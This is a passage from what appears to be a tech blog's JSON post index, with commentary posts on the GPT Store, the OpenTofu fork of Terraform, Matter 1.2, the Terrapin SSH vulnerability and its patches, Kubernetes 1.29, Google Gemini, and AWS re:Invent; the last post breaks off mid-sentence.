revenue-sharing details closely. That\u0026rsquo;ll tell us more about OpenAI\u0026rsquo;s commitment to the ecosystem than any number of blog posts.\n","date":"18 January 2024","externalUrl":null,"permalink":"/posts/240118-gpt-store-launch-ai-development/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI launches the GPT Store, creating a marketplace for custom GPTs. Here’s what it means for developers and why the platform play matters more than the individual bots.","title":"The GPT Store Is Live — What It Means for AI Development","type":"posts"},{"content":"It\u0026rsquo;s only been about four months since the OpenTofu project was announced as a direct response to HashiCorp\u0026rsquo;s controversial switch of Terraform to the Business Source License (BSL). Now, with the release of OpenTofu 1.6, we have a production-ready, generally available fork that\u0026rsquo;s positioning itself as the community\u0026rsquo;s answer to a fundamental question: who owns infrastructure-as-code? Just a week earlier, the project had announced its first stable release, establishing itself as a credible alternative to HashiCorp\u0026rsquo;s direction.\nI\u0026rsquo;ve been watching this unfold with a mixture of cautious optimism and professional concern. After all, when you\u0026rsquo;ve spent years building pipelines and modules around a tool, a licensing change isn\u0026rsquo;t just corporate politics — it\u0026rsquo;s a direct threat to your workflow.\nWhat OpenTofu 1.6 Actually Delivers # Let\u0026rsquo;s cut through the narrative and look at what shipped. OpenTofu 1.6 is essentially a drop-in replacement for Terraform 1.6, which is exactly what the community needed as a starting point. The project maintains full compatibility with existing Terraform state files, modules, and providers. If you have a terraform binary in your CI pipeline, swapping it for tofu should be largely seamless.\nThe release includes the usual suspects: support for testing with tofu test, S3 state backend improvements, and the provider-defined function framework that was in the Terraform 1.6 pipeline. But the real story isn\u0026rsquo;t about features — it\u0026rsquo;s about governance and momentum.\nThe project is now under the Linux Foundation, backed by companies like Spacelift, env0, Scalr, and Gruntwork. That\u0026rsquo;s not just moral support; these are companies that have built their businesses around Terraform workflows and have a material interest in keeping the ecosystem open.\nThe BSL Question Isn\u0026rsquo;t Going Away # HashiCorp\u0026rsquo;s move to BSL last August sent shockwaves through the infrastructure community, and rightly so. The BSL essentially means you can use Terraform freely unless you\u0026rsquo;re offering a competing service — but the definition of \u0026ldquo;competing\u0026rdquo; is vague enough to make legal departments nervous.\nI\u0026rsquo;ve talked to several teams at mid-size companies who are genuinely unsure whether their internal platform engineering setups could be considered \u0026ldquo;competitive\u0026rdquo; under the BSL. When your infrastructure tooling requires a legal opinion to deploy, something has gone wrong.\nThis isn\u0026rsquo;t unique to HashiCorp, of course. We saw similar concerns with Redis, MongoDB, and Elastic changing their licenses. But Terraform occupies such a foundational position in modern infrastructure that the impact is amplified. It\u0026rsquo;s the kind of tool that becomes invisible — you don\u0026rsquo;t think about it until it breaks or, in this case, until someone changes the rules.\nWhat This Means for Your Existing Pipelines # If you\u0026rsquo;re running Terraform today, you don\u0026rsquo;t need to panic. HashiCorp hasn\u0026rsquo;t changed the license retroactively (they can\u0026rsquo;t), and for most teams doing internal infrastructure work, the BSL doesn\u0026rsquo;t apply. But if you\u0026rsquo;re planning ahead — and you should be — here\u0026rsquo;s my practical take:\nFor internal teams: Keep an eye on OpenTofu but don\u0026rsquo;t rush to migrate. The 1.6 release is solid, but the real test comes with 1.7 and beyond, when the projects start to diverge. You want to see that OpenTofu can innovate independently, not just track HashiCorp\u0026rsquo;s releases.\nFor platform teams building internal tools: This is where it gets murky. If you\u0026rsquo;re building an internal developer platform that wraps Terraform, you should at least evaluate OpenTofu as a risk mitigation strategy. Having a migration plan doesn\u0026rsquo;t mean you have to execute it.\nFor vendors and consultancies: If you offer Terraform-related services, you need a clear understanding of where you stand with the BSL. OpenTofu gives you an unambiguous fallback.\nThe state file compatibility is crucial here. It means you can experiment with OpenTofu in a staging environment without committing to anything. Just point it at your existing state and see what happens. In my testing, the migration is as boring as it should be — which is exactly the kind of boring I like in infrastructure tooling.\nThe Bigger Picture: Open Source Sustainability # What I find most interesting about the OpenTofu story isn\u0026rsquo;t the technical details — it\u0026rsquo;s what it says about the state of open-source business models. HashiCorp built an incredible company on open-source tools, went public, and then decided the open-source model wasn\u0026rsquo;t working for them. You can argue about whether they were right to do that, but you can\u0026rsquo;t deny they\u0026rsquo;ve created a template that makes other companies nervous. We\u0026rsquo;ve seen similar tensions arise in other open-source projects, where the economics of sustainability and community expectations collide.\nEvery time I adopt a new open-source tool now, I find myself asking: what\u0026rsquo;s the exit strategy if the license changes? That\u0026rsquo;s a sad question to have to ask, but it\u0026rsquo;s a pragmatic one.\nOpenTofu represents one answer: if you build a big enough community around a tool, the community can sustain it independently. But that only works when enough companies step up with real resources — developers, infrastructure, money. The Linux Foundation backing helps, but the proof will be in whether OpenTofu can attract and retain contributors over the next year.\nMy Take # I\u0026rsquo;m cautiously bullish on OpenTofu. The 1.6 release is exactly what it needed to be: boring, compatible, and stable. The governance structure is sound, and the backing companies have real skin in the game.\nBut I\u0026rsquo;ve also been around long enough to see forks fizzle out. The initial energy is always high — it\u0026rsquo;s sustaining that energy through the unglamorous work of bug fixes, security patches, and documentation that separates viable projects from abandoned ones.\nFor now, I\u0026rsquo;m running OpenTofu in my personal projects and keeping Terraform in production at work. I\u0026rsquo;ll revisit that decision when OpenTofu 1.7 lands and we can see whether the project is charting its own course or just playing catch-up.\nThe infrastructure-as-code space is healthier for having this competition. Whatever happens with OpenTofu specifically, the message to every open-source steward is clear: your community is an asset, not a liability. Treat it accordingly.\n","date":"11 January 2024","externalUrl":null,"permalink":"/posts/240111-opentofu-1-6-terraform-fork-grows-up/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenTofu hits its first GA release, proving that the open-source fork of Terraform is more than a protest — it’s a viable alternative.","title":"OpenTofu 1.6 GA — The Terraform Fork Grows Up","type":"posts"},{"content":"Happy new year. While most of the tech world was recovering from the holidays, the OpenTofu project has been quietly building momentum toward its first stable release. For those who missed the drama: last August, HashiCorp switched Terraform from the Mozilla Public License (MPL 2.0) to the Business Source License (BSL 1.1), effectively making it non-open-source. The community\u0026rsquo;s response was swift and decisive — OpenTofu, a truly open-source fork of Terraform, is now under the Linux Foundation\u0026rsquo;s stewardship and approaching general availability. This follows a long history of infrastructure-as-code evolution where practitioners have depended on open tooling for critical operational work.\nHow We Got Here # HashiCorp\u0026rsquo;s license change in August 2023 sent shockwaves through the infrastructure-as-code community. Terraform had been the de facto standard for cloud provisioning for nearly a decade, and much of its dominance was built on the trust that comes with genuine open-source licensing. The BSL 1.1 license restricts competitive use — meaning companies that offer products competing with HashiCorp\u0026rsquo;s commercial offerings can no longer freely use the Terraform codebase.\nThe response was remarkably organized. Within days, a manifesto appeared with signatures from major Terraform ecosystem players including Gruntwork, Spacelift, Env0, and Scalr. By September, the fork was official and had been accepted into the Linux Foundation. The speed of this mobilization tells you something about how deeply the community values genuine open-source licensing for infrastructure tooling.\nI\u0026rsquo;ve been through enough open-source licensing disputes to know that forks often start with energy and fizzle out. But OpenTofu has several things working in its favor: corporate backing from companies whose businesses depend on an open Terraform ecosystem, Linux Foundation governance providing neutrality, and a codebase that was already well-understood by hundreds of contributors.\nWhat OpenTofu Brings # At its core, OpenTofu is a drop-in replacement for Terraform. The initial releases have focused on maintaining compatibility — if you have existing Terraform configurations, the migration path is designed to be as simple as changing the binary you run. Same HCL syntax, same provider ecosystem, same state file format.\nBut the project isn\u0026rsquo;t just about maintaining the status quo. The roadmap includes features the community has long requested, with state encryption being one of the most anticipated. Terraform state files can contain sensitive information — database passwords, API keys, private IPs — and they\u0026rsquo;ve historically been stored unencrypted. State encryption in OpenTofu would address a security gap that the community has been asking HashiCorp to fix for years.\nThe provider registry is another area where OpenTofu is establishing independence. While maintaining compatibility with existing Terraform providers, the project is building its own registry infrastructure to ensure it isn\u0026rsquo;t dependent on HashiCorp\u0026rsquo;s services. This is crucial for long-term viability — you can\u0026rsquo;t claim independence if your tool still phones home to the company you forked from.\nThe Broader License Debate # The HashiCorp situation isn\u0026rsquo;t isolated. We\u0026rsquo;ve seen similar license changes from MongoDB (SSPL), Elastic (SSPL, then a partial reversal), Redis (Commons Clause, then RSAL), and Confluent (Community License). The pattern is clear: companies that built businesses on open-source software are feeling pressure from cloud providers offering their tools as managed services, and they\u0026rsquo;re responding by restricting their licenses.\nI understand the business pressure. Building and maintaining complex infrastructure software is expensive, and watching AWS or Azure offer a managed version of your product without contributing proportionally back is genuinely frustrating. But the solution of changing licenses after building a community on open-source trust feels like a betrayal, and the market is responding accordingly.\nThe interesting question is whether OpenTofu can maintain momentum long-term. Forks succeed when they attract a sustainable contributor community and when the ecosystem (in this case, providers and modules) supports them. The early signs are positive — major Terraform providers are compatible, and the companies backing OpenTofu have direct business incentives to keep contributing.\nPractical Implications # If you\u0026rsquo;re running Terraform in production today, here\u0026rsquo;s my practical take:\nDon\u0026rsquo;t panic. The BSL license doesn\u0026rsquo;t affect most users. If you\u0026rsquo;re using Terraform to manage your own infrastructure, nothing changes for you legally. The restrictions apply to companies building competitive products.\nStart evaluating OpenTofu. Even if the license change doesn\u0026rsquo;t affect you directly, there\u0026rsquo;s value in having a fully open-source option. Set up a parallel pipeline with OpenTofu and verify your configurations work. The migration cost today is minimal.\nWatch the provider ecosystem. The critical dependency for any Terraform-like tool is provider support. Monitor how providers handle dual compatibility. Most major providers (AWS, Azure, GCP, Kubernetes) use the Terraform Plugin SDK, which OpenTofu supports.\nConsider your CI/CD pipeline. If you\u0026rsquo;re using Terraform Cloud or Terraform Enterprise, the switch to OpenTofu would also mean changing your orchestration layer. Tools like Spacelift, Env0, and Atlantis already support or are adding OpenTofu support.\nMy Take # I\u0026rsquo;ve been using Terraform since version 0.6, and I\u0026rsquo;ve watched it grow from a promising tool into the backbone of infrastructure automation at thousands of organizations. The license change genuinely disappointed me — not because I don\u0026rsquo;t understand HashiCorp\u0026rsquo;s business pressures, but because it undermined the trust relationship between the project and its community. The broader open-source ecosystem has faced similar tensions between maintainer sustainability and community trust, and these patterns are interconnected.\nOpenTofu represents something important beyond just a Terraform alternative. It\u0026rsquo;s a test case for whether the open-source community can effectively fork and sustain a complex infrastructure tool when the original maintainer changes direction. If OpenTofu succeeds, it sends a clear signal to other companies considering similar license changes: the community will route around restrictions, and you might end up competing with a well-funded fork of your own software.\nAs we start 2024, I\u0026rsquo;m cautiously optimistic about OpenTofu\u0026rsquo;s trajectory. The governance model is sound, the backing is substantial, and the technical foundation is solid. Whether it can attract enough independent contributors to innovate beyond what Terraform offers — that\u0026rsquo;s the question that will determine if this is a footnote or a turning point for infrastructure as code.\n","date":"4 January 2024","externalUrl":null,"permalink":"/posts/240104-opentofu-open-source-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As OpenTofu approaches its first stable release, the HashiCorp license change continues to reshape how we think about open source infrastructure tooling.","title":"OpenTofu and the Future of Open Source Infrastructure","type":"posts"},{"content":"As 2023 wraps up, it\u0026rsquo;s worth taking stock of one of the more quietly significant developments in the tech world: the Matter protocol reaching version 1.2, expanding its device type support and slowly — very slowly — delivering on the promise of smart home interoperability. Having lived through every failed IoT standardization attempt of the past fifteen years, I\u0026rsquo;m cautiously optimistic for the first time in a while.\nWhere We Are # Matter 1.2, released by the Connectivity Standards Alliance (CSA) in October, added support for nine new device types including refrigerators, room air conditioners, dishwashers, laundry washers and dryers, robotic vacuum cleaners, smoke and CO alarms, air quality sensors, and fans. This brings the total supported device categories to a point where Matter starts to look like a genuinely comprehensive smart home protocol rather than a proof of concept limited to lights and switches.\nThe original Matter 1.0 specification, released in late 2022, supported a relatively narrow set of devices: lighting, HVAC controls, door locks, blinds, media devices, and a few others. It was enough to demonstrate the concept but not enough to build a complete smart home ecosystem around. Version 1.1 added refinements, and now 1.2 significantly broadens the scope.\nMore importantly, the major ecosystem players continue to participate. Apple HomeKit, Google Home, Amazon Alexa, and Samsung SmartThings all support Matter devices. When was the last time Apple, Google, Amazon, and Samsung agreed on anything? That alone tells you this standard has legs.\nWhy It Matters for Developers # For those of us building IoT applications or integrating smart devices into larger systems, Matter addresses the fundamental pain point: every manufacturer\u0026rsquo;s proprietary protocol requiring its own integration, its own cloud service, its own authentication flow, and its own failure modes.\nMatter runs over Thread (for low-power mesh networking) and Wi-Fi (for higher-bandwidth devices), with Bluetooth Low Energy used for commissioning. The protocol itself uses IPv6 natively, which means Matter devices are real network citizens rather than opaque bridges sitting behind manufacturer-specific hubs.\nFrom an architecture perspective, this is transformative. Instead of building integrations against dozens of proprietary APIs — each with their own rate limits, authentication quirks, and deprecation timelines — you can target a single, well-documented protocol. The Matter SDK is open source and actively maintained, which lowers the barrier for both device manufacturers and application developers.\nThe local-first nature of Matter also matters enormously. Devices communicate locally within the home network rather than routing through cloud services. This means better latency, continued operation during internet outages, and significantly better privacy characteristics. After years of IoT devices phoning home to servers in jurisdictions with questionable data protection, local control is a welcome default.\nThe Challenges That Remain # Let\u0026rsquo;s not pretend this is a solved problem. Matter adoption is still slower than the industry hoped. Device manufacturers are cautious about the certification costs and engineering effort required. Many have released Matter-compatible firmware updates for existing devices, but the experience can be hit-or-miss.\nThe Thread border router situation is particularly fragmented. You need a Thread border router to communicate with Thread-based Matter devices, and while Apple TV 4K, HomePod Mini, and some Google Nest devices serve as border routers, the setup isn\u0026rsquo;t always intuitive. I\u0026rsquo;ve spent more time than I\u0026rsquo;d like debugging Thread network formation issues across different border routers.\nThere\u0026rsquo;s also the \u0026ldquo;Matter bridge\u0026rdquo; pattern, where manufacturers expose their existing proprietary devices through a Matter bridge. This gets devices into the Matter ecosystem but doesn\u0026rsquo;t deliver the full local-control promise — you still depend on the manufacturer\u0026rsquo;s hub and potentially their cloud service. It\u0026rsquo;s a pragmatic transition approach, but it muddies the value proposition.\nAnd then there\u0026rsquo;s the feature gap. Matter\u0026rsquo;s device models define a common set of capabilities, but many devices have manufacturer-specific features that don\u0026rsquo;t map cleanly to the standard attributes. Your fancy robot vacuum might show up as a basic on/off device in Matter, with all the advanced mapping and scheduling features only available through the manufacturer\u0026rsquo;s own app.\nThe Home Assistant Factor # I\u0026rsquo;d be remiss not to mention Home Assistant, which has become the de facto hub for anyone serious about home automation. Home Assistant\u0026rsquo;s Matter support has been improving steadily, and the combination of Matter for device communication with Home Assistant for automation and intelligence is looking increasingly compelling.\nWhat Home Assistant demonstrates is that there\u0026rsquo;s enormous demand for a unified control layer, and Matter provides the device communication substrate that makes this viable without requiring hundreds of custom integrations. The open-source community around home automation has been solving this problem from the top down (integration layer) while Matter solves it from the bottom up (protocol layer). The convergence of these approaches is where IoT finally starts to deliver on its decade-old promises.\nMy Take # I\u0026rsquo;ve been building and tinkering with IoT systems since before the term existed — back when we just called it \u0026ldquo;embedded systems with network connectivity.\u0026rdquo; Every few years, a new standard promises to unify the ecosystem, and every few years, the industry fragments further. Zigbee, Z-Wave, HomeKit, various Thread implementations — my home lab has collected protocols like others collect vintage wine.\nMatter feels different, primarily because of the breadth of industry support. When Apple and Google both commit engineering resources to the same protocol, the gravitational pull is hard for smaller players to resist. Version 1.2\u0026rsquo;s expanded device support shows momentum, not stagnation.\nIs Matter perfect? Absolutely not. The commissioning experience needs work, Thread networking can be finicky, and the feature gap for advanced device capabilities is real. But for the first time in the IoT space, we have a standard that major players are actively investing in, that runs locally, that\u0026rsquo;s built on IP, and that\u0026rsquo;s open enough for the community to build on. As we head into 2024, I\u0026rsquo;m cautiously optimistic that the IoT interoperability dream might actually be within reach. Cautiously.\n","date":"28 December 2023","externalUrl":null,"permalink":"/posts/231228-matter-protocol-iot-standardization/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Matter protocol reaches version 1.2, expanding device support and inching closer to the interoperability promise that IoT has needed for years.","title":"Matter 1.2 and the Slow March Toward IoT Sanity","type":"posts"},{"content":"Just in time for the holidays, security researchers from Ruhr University Bochum have published details on Terrapin (CVE-2023-48795), a novel attack against the SSH protocol that affects virtually every SSH implementation in existence. When I first read the paper, my reaction was a mix of admiration for the research and that familiar sinking feeling you get when a protocol you\u0026rsquo;ve trusted implicitly for decades turns out to have a subtle flaw.\nWhat Is Terrapin? # Terrapin is a prefix truncation attack that targets the SSH handshake. By manipulating sequence numbers during the initial key exchange, an attacker performing a man-in-the-middle can effectively delete messages from the beginning of the encrypted channel without either side detecting the manipulation. The attack exploits the way SSH handles sequence numbers in combination with certain encryption modes.\nThe critical insight is that during the handshake, before the encrypted channel is fully established, there\u0026rsquo;s a window where an active attacker can inject and delete packets. By carefully truncating specific messages, the attacker can downgrade the security of the connection — for example, disabling keystroke timing obfuscation in OpenSSH or forcing a fallback to weaker authentication mechanisms.\nTo be clear: this isn\u0026rsquo;t a \u0026ldquo;decrypt all your SSH traffic\u0026rdquo; attack. It requires an active man-in-the-middle position, and its impact varies depending on the specific SSH implementation and configuration. But the fact that it works at the protocol level, not due to an implementation bug, means every SSH client and server is potentially affected.\nThe Technical Details # The attack specifically targets encryption modes that use the encrypt-then-MAC approach or the ChaCha20-Poly1305 cipher. These are, ironically, some of the more modern and generally recommended cipher configurations. The older encrypt-and-MAC mode is also vulnerable, though through a slightly different mechanism.\nWhat makes this particularly clever is the exploitation of SSH\u0026rsquo;s Binary Packet Protocol. SSH assigns sequence numbers to packets, but these sequence numbers aren\u0026rsquo;t cryptographically protected during the handshake transition. The attacker can inject a carefully crafted SSH_MSG_IGNORE message during the handshake, which increments the sequence number on the server side. When the encrypted channel begins, the client and server have different views of the sequence number state, allowing the attacker to delete a specific number of messages from the beginning of the encrypted stream.\nThe researchers found that roughly 77% of SSH servers on the internet support a vulnerable encryption mode, making this a widespread concern even if the practical exploitability has significant constraints.\nImpact Assessment # Let\u0026rsquo;s be practical about severity. The Terrapin attack requires:\nAn active man-in-the-middle position on the network The connection must use a vulnerable cipher suite The actual impact depends on what those truncated initial messages contained For most SSH usage — connecting to servers, running remote commands, transferring files — the practical impact is limited. The attacker can\u0026rsquo;t read or modify the content of your session. What they can do is strip certain security features that are negotiated at the start of the connection.\nThe most concrete impact is against OpenSSH\u0026rsquo;s chacha20-poly1305@openssh.com cipher and the keystroke timing countermeasures introduced in OpenSSH 9.5. An attacker could disable these countermeasures, potentially making keystroke timing analysis attacks viable again. For most server administration tasks, this is a modest risk. For high-security environments, it\u0026rsquo;s worth taking seriously.\nWhat To Do About It # OpenSSH 9.6, released alongside this disclosure, introduces a strict key exchange mode that prevents the attack. Both client and server need to support the new extension for it to be effective. The mitigation adds a kex-strict-s-v00@openssh.com and kex-strict-c-v00@openssh.com extension that resets sequence numbers after key exchange, closing the manipulation window.\nFor immediate practical steps:\nUpdate OpenSSH to 9.6 on both clients and servers If you can\u0026rsquo;t update immediately, consider disabling ChaCha20-Poly1305 and encrypt-then-MAC ciphers in your SSH configuration, falling back to AES-GCM which is not affected Audit your cipher configurations — this is a good time to review what your SSH config actually allows versus what you need Check the Terrapin vulnerability scanner released by the researchers Other implementations are also releasing patches. PuTTY, libssh, Paramiko, and others have all been coordinated on this disclosure.\nThe Bigger Picture # What fascinates me about Terrapin is what it reveals about the assumptions we make about mature protocols. SSH has been scrutinized by security researchers for over two decades. It\u0026rsquo;s one of the protocols we trust most implicitly — I use it dozens of times a day without thinking twice. And yet, a subtle interaction between sequence number handling and the handshake transition created a vulnerability that went unnoticed for years.\nThis pattern repeats throughout security history. TLS had BEAST, CRIME, POODLE, and Heartbleed. DNS had the Kaminsky attack. Now SSH has Terrapin. The lesson isn\u0026rsquo;t that these protocols are broken — it\u0026rsquo;s that cryptographic protocol security is extraordinarily difficult, and our tools for reasoning about protocol composition and state transitions still have gaps.\nMy Take # As someone who\u0026rsquo;s been using SSH since its early days as a replacement for telnet and rsh, Terrapin is a humbling reminder. The practical risk for most of us is low — you need an active MITM, and the impact is limited to feature downgrade rather than content compromise. But \u0026ldquo;low practical risk\u0026rdquo; isn\u0026rsquo;t the same as \u0026ldquo;no action needed.\u0026rdquo;\nUpdate your SSH implementations over the holiday break. Review your cipher configurations. And take a moment to appreciate the researchers who found this — responsible disclosure of protocol-level vulnerabilities is the kind of security work that makes the entire ecosystem stronger. \u0026lsquo;Tis the season for patching, apparently.\n","date":"21 December 2023","externalUrl":null,"permalink":"/posts/231221-terrapin-ssh-attack-vulnerability/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Researchers disclose the Terrapin attack against SSH, demonstrating that even our most trusted protocols can harbor subtle cryptographic weaknesses.","title":"Terrapin Attack — SSH Isn't As Bulletproof As We Thought","type":"posts"},{"content":"Kubernetes 1.29, codenamed Mandala, dropped this week, and while it may not have the headline-grabbing drama of an AI model launch, this release carries some changes that will genuinely affect how we build and operate containerized workloads. After managing container orchestration systems since the early Docker Swarm days, I can appreciate when a release focuses on solving real operational pain points rather than adding flashy new features.\nNative Sidecar Containers: Finally # The headline feature for me is the promotion of native sidecar containers to beta. If you\u0026rsquo;ve ever dealt with the awkward dance of init containers, sidecar proxies, and job completion semantics in Kubernetes, you know this has been a long time coming.\nThe problem was straightforward but surprisingly painful: Kubernetes had no first-class concept of a container that should start before the main application container and run alongside it for the pod\u0026rsquo;s lifetime. Service meshes like Istio worked around this with init containers and lifecycle hooks, but the hacks were fragile. Jobs were particularly problematic — a Job\u0026rsquo;s pod would technically never complete because the sidecar container kept running.\nWith KEP-753, sidecar containers are now defined using restartPolicy: Always on init containers. They start in order before regular containers, run for the pod\u0026rsquo;s lifetime, and are properly terminated during shutdown. It\u0026rsquo;s elegant in its simplicity, and it solves a category of bugs that have plagued service mesh deployments for years.\nNetworking Improvements # The networking side of 1.29 brings several welcome changes. The nftables backend for kube-proxy has reached alpha, beginning the long-overdue migration away from iptables. If you\u0026rsquo;ve ever debugged a cluster with thousands of services and watched iptables rules balloon into an unmanageable mess, you understand why this matters. nftables offers better performance characteristics and a more maintainable rule structure.\nThere\u0026rsquo;s also progress on the Gateway API front, which continues its march toward becoming the standard for ingress and service mesh configuration in Kubernetes. The API\u0026rsquo;s maturity is reaching the point where I\u0026rsquo;m comfortable recommending it for new deployments over the traditional Ingress resource. The expressiveness of HTTPRoute and the multi-tenancy story with Gateway classes solve problems that Ingress never could cleanly.\nLoad Balancer IP Mode # A smaller but practical addition is the loadBalancerIPMode feature for Services, which gives you more control over how traffic from cloud load balancers reaches your pods. You can now specify whether the load balancer IP should be treated as a true VIP (routed at the network level) or as a proxy endpoint. This matters for performance-sensitive applications where the extra hop through kube-proxy was adding unwanted latency.\nFor those of us running Kubernetes on the major cloud providers, this kind of fine-grained control over networking behavior is exactly what we need. The default behavior works for most cases, but when you\u0026rsquo;re optimizing for the tail end of your latency distribution, these knobs matter.\nStorage and Scheduling # On the storage front, ReadWriteOncePod access mode is now generally available. This ensures that a PersistentVolumeClaim can only be mounted by a single pod across the entire cluster — not just a single node. It\u0026rsquo;s a subtle but important distinction for stateful workloads where data corruption from concurrent access is a real risk.\nThe scheduler also gained improvements around pod topology spread constraints, making it easier to distribute workloads evenly across failure domains. If you\u0026rsquo;ve wrestled with getting pods spread across availability zones without leaving some zones over-provisioned and others underutilized, the refinements here should help.\nThe Maturity Story # What strikes me most about Kubernetes 1.29 isn\u0026rsquo;t any single feature — it\u0026rsquo;s the pattern. The project has clearly shifted from \u0026ldquo;add everything\u0026rdquo; to \u0026ldquo;finish what we started and make operations smoother.\u0026rdquo; Features are graduating from alpha to beta to GA at a steady pace. The rough edges that made Kubernetes painful in production three years ago are being systematically filed down.\nI remember deploying Kubernetes 1.8 and needing a small army of YAML templating tools, custom operators, and tribal knowledge to keep things running. Today\u0026rsquo;s Kubernetes, while still complex, is measurably more operable. The sidecar container support alone will eliminate an entire category of support tickets for teams running service meshes.\nMy Take # Kubernetes 1.29 is a \u0026ldquo;boring in the best way\u0026rdquo; release. No revolutionary new concepts, just steady improvement in areas that matter for production workloads. The sidecar support removes a genuine pain point, the networking improvements lay groundwork for better performance, and the storage and scheduling refinements show a project that\u0026rsquo;s listening to operator feedback.\nIf you\u0026rsquo;re running 1.27 or 1.28, the upgrade path should be smooth — as always, test your admission webhooks and any custom controllers first. If you\u0026rsquo;re still on something older, the accumulated improvements make a compelling case for catching up. The Kubernetes ecosystem in late 2023 is mature enough that upgrades are routine rather than stressful, and that itself is a sign of how far we\u0026rsquo;ve come.\n","date":"14 December 2023","externalUrl":null,"permalink":"/posts/231214-kubernetes-129-mandala-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.29 ships with native sidecar container support, improved networking, and a continued push toward simplifying cluster operations.","title":"Kubernetes 1.29 Mandala — Sidecars Finally Graduate","type":"posts"},{"content":"Google just dropped Gemini, and the AI landscape shifted again. After months of speculation and what felt like an eternity of playing catch-up to OpenAI, Google DeepMind has released what they claim is their most capable model to date — one that natively understands text, code, audio, image, and video. Having watched this space for three decades now, I can tell you: the pace of change in 2023 has been unlike anything I\u0026rsquo;ve seen before.\nWhat Makes Gemini Different # The key selling point here isn\u0026rsquo;t just benchmark performance — though Google is certainly eager to highlight that Gemini Ultra reportedly outperforms GPT-4 on several standard benchmarks including MMLU. What\u0026rsquo;s genuinely interesting is the architecture: Gemini was built from the ground up as a multimodal model, not a text model with vision bolted on afterward.\nThis matters more than it might seem at first glance. When you retrofit multimodal capabilities onto a text-first architecture, you get something that can process images but doesn\u0026rsquo;t truly reason across modalities. Google\u0026rsquo;s claim is that Gemini can natively interleave understanding across text, images, audio, and video in a way that feels more integrated. Whether that holds up in real-world usage remains to be seen — benchmarks and demos have a way of looking better than production reality.\nThe model comes in three sizes: Ultra (the full powerhouse), Pro (the balanced middle tier already rolling out in Bard), and Nano (designed to run on-device, specifically on the Pixel 8 Pro). That tiered approach is smart — it acknowledges that not every use case needs the biggest model, and on-device inference is where a lot of practical value lives.\nThe Developer Angle # For those of us building applications, the immediate impact comes through the Gemini API, available via Google AI Studio and Vertex AI. Gemini Pro is accessible now, and it slots into the space where many teams have been using GPT-3.5 Turbo — fast, capable, cost-effective.\nWhat I find most compelling from a development perspective is the potential for truly multimodal application logic. Right now, most AI-powered applications treat different input types as separate pipelines: you have your text processing, your image analysis, maybe some audio transcription, and you glue them together with application code. A natively multimodal model opens the door to much simpler architectures where you can throw heterogeneous inputs at a single endpoint and get coherent reasoning back.\nOf course, \u0026ldquo;opens the door\u0026rdquo; and \u0026ldquo;works reliably in production\u0026rdquo; are two very different things. I\u0026rsquo;ve been burned enough times by demo-day promises to maintain healthy skepticism. But the direction is clear, and competition in this space benefits all of us who build on these platforms.\nThe Competitive Landscape # This launch puts real pressure on OpenAI and the open-source community. OpenAI has been the clear front-runner since ChatGPT\u0026rsquo;s launch a year ago, and while Google had Bard and PaLM 2, they never quite matched the developer mindshare that OpenAI captured. Gemini feels like a more serious response.\nBut here\u0026rsquo;s what I think matters more than the Google vs. OpenAI narrative: this accelerates the expectation that AI models should be multimodal by default. Meta\u0026rsquo;s Llama 2 pushed open-source text models forward. Now the bar is moving to multimodal capabilities. Mistral just released Mixtral 8x7B this week as well — the open-source ecosystem isn\u0026rsquo;t standing still.\nFor teams evaluating their AI stack, the practical takeaway is that model choice is increasingly about ecosystem fit rather than raw capability. Google\u0026rsquo;s integration with Cloud Platform, OpenAI\u0026rsquo;s partnership with Microsoft Azure, and the flexibility of open-source models all represent different trade-offs that matter more than a few percentage points on benchmarks.\nThe On-Device Story # The Nano variant deserves special attention. Running capable AI models directly on mobile hardware is a game-changer for applications where latency matters, where privacy is a concern, or where connectivity is unreliable. Google shipping this in the Pixel 8 Pro suggests they see on-device AI as a mainstream feature, not a research curiosity.\nI\u0026rsquo;ve been working with edge computing long enough to know that the gap between \u0026ldquo;runs on device\u0026rdquo; and \u0026ldquo;runs well on device\u0026rdquo; can be enormous. But the trajectory is promising. If Gemini Nano delivers even 70% of what the demos suggest, it opens up entire categories of mobile and IoT applications that currently require round-trips to cloud APIs.\nMy Take # After thirty years in this industry, I\u0026rsquo;ve learned to separate signal from noise in product launches. Gemini is signal. It may not immediately dethrone GPT-4 in every benchmark or use case, but it validates the multimodal-native approach and introduces genuine competition at the top of the AI capability spectrum.\nWhat I\u0026rsquo;m watching for is the developer experience. The best model in the world doesn\u0026rsquo;t matter if the API is flaky, the documentation is sparse, or the pricing model doesn\u0026rsquo;t work for real applications. Google has historically struggled with developer relations compared to smaller, more focused companies. If they get that right with Gemini, the impact on our industry could be substantial.\nFor now, I\u0026rsquo;d recommend any team currently building with LLMs to allocate some time to evaluate Gemini Pro through the API. Competition is good for all of us, and having viable alternatives to OpenAI\u0026rsquo;s offerings makes our architectures more resilient.\n","date":"7 December 2023","externalUrl":null,"permalink":"/posts/231207-google-gemini-multimodal-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google launches Gemini, its most capable AI model yet, bringing native multimodal reasoning to the forefront of the AI race.","title":"Google Gemini Arrives — Multimodal AI Gets Real","type":"posts"},{"content":"I\u0026rsquo;m writing this from Las Vegas, where AWS re:Invent is in full swing and the message from Amazon couldn\u0026rsquo;t be clearer: AI is being woven into every layer of the cloud stack. After a year where OpenAI and Microsoft dominated the AI narrative, AWS is making its play — not by competing on foundation models alone, but by embedding AI capabilities into the infrastructure and developer tools that millions of organizations already depend on.\nThe keynote announcements from Adam Selipsky and Werner Vogels have been dense, so let me cut through the marketing and highlight what actually matters for developers and infrastructure teams.\nAmazon Q: AWS\u0026rsquo;s AI Assistant Play # The headline announcement is Amazon Q, AWS\u0026rsquo;s new AI assistant designed for enterprise use. Unlike general-purpose chatbots, Amazon Q is specifically built to understand your AWS environment, your codebase, and your business data. It comes in several flavors:\nAmazon Q Developer (previously CodeWhisperer Chat) integrates into IDEs and can answer questions about your AWS infrastructure, help debug issues, transform code between frameworks, and even handle Java version upgrades semi-autonomously. This represents AWS\u0026rsquo;s counter to GitHub Copilot and similar AI coding assistants. AWS demonstrated upgrading Java 8 applications to Java 17 with Q handling the bulk of the migration work — not just syntax changes but dependency updates and API 